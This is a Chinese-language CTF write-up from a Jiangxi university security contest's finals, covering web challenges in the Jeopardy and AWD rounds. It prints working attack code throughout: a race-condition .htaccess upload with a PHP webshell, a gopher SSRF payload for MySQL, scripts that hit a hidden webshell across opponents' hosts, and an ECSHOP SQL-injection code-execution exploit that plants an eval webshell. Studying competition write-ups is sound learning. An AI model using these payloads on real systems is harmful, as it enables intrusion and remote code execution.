第三届江西高校网安大赛线下决赛web解题思路

本次大赛,恭喜本战队bleem,取得优异成绩,加油!

Jeopardy

上午解题模式中,给了两个web

web1:

这题上传一个图片．用burp修改php类型上传之后会得到提示，＇比比谁速度快＇,尝试上传.htaccess,也是可以猜想到通过竞争条件一直上传.htaccess,这样再上传一个图片木马,即可获取shell

上传.htaccess脚本

import requests
import time



while True:
    files = {
    
    'file': ('.htaccess', open('.htaccess', 'rb'), 'image/jpeg')}
    r = requests.post('http://127.0.0.1/upload',files=files)
    time.sleep(0.5)


"""
.htaccess:

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
"""

再上传一个jpg的图片一句话木马就ok了
shell.jpg

<?php system('cat /flag.txt');?>

web2:

这题可以通过file协议读取/etc/passwd,但是读取file:///flag.txt发现并不存在,读取index.php被禁止,通过F12查看网页源码,发现flag存放在mysql里面,首先想到通过gopher协议读取flag,比赛中没能构造好payload,不管这个方法对不对,也当是学习啦

访问mysql执行查询语句

wireshark抓包,追踪流,过滤出红色的发送数据

把数据转换一下
gopher://127.0.0.1:3306/_%26%00%00%01%85%a6%03%00%00%00%00%01%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%28%00%00%00%03%73%65%6c%65%63%74%20%69%6e%66%6f%20%66%72%6f%6d%20%64%76%77%61%2e%63%74%68%61%63%6b%20%77%68%65%72%65%20%69%64%3d%32

CRLF的问题,curl测试结尾加上%0d0a

AWD模式

下午的AWD模式也是只有两个web

web1:
web1在/var/www/html/目录下ls -a可以发现一个隐藏为.shell.php,过滤了flag可以通过cat /fla*绕过
脚本:

import requests

ip1='http://172.20.'
ip2='.101'
ip=[]

for i in range(101,113,1):
    ip.append(ip1+str(i)+ip2)

data={
    
    'cmd':'system("cat /fla*");'}

for i in ip:
    try:
        r=requests.post(i+'/.shell.php',data=data,timeout=0.5)
        print i
        print r.text
    except:
        pass

web2:
ECSHOP的代码执行漏洞
先执行curl命令的payload
附上脚本:

import requests
import os

'''
curl "http://172.20.102.102/user.php" -d "action=login&okami=phpinfo();exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'



curl "http://172.20.102.102/user.php" -d "action=login&okami=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbChbb2thbWldKTsnKQoOw));exit;" \-H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
'''


ip1='http://172.20.'
ip2='.102'
ip=[]

for i in range(101,113,1):
    ip.append(ip1+str(i)+ip2)

for i in ip:
    try:
        r=requests.post(i+'/okami.php?okami=system("cat /flag.txt");',timeout=0.5)
        print i
        print r.text
    except:
        pass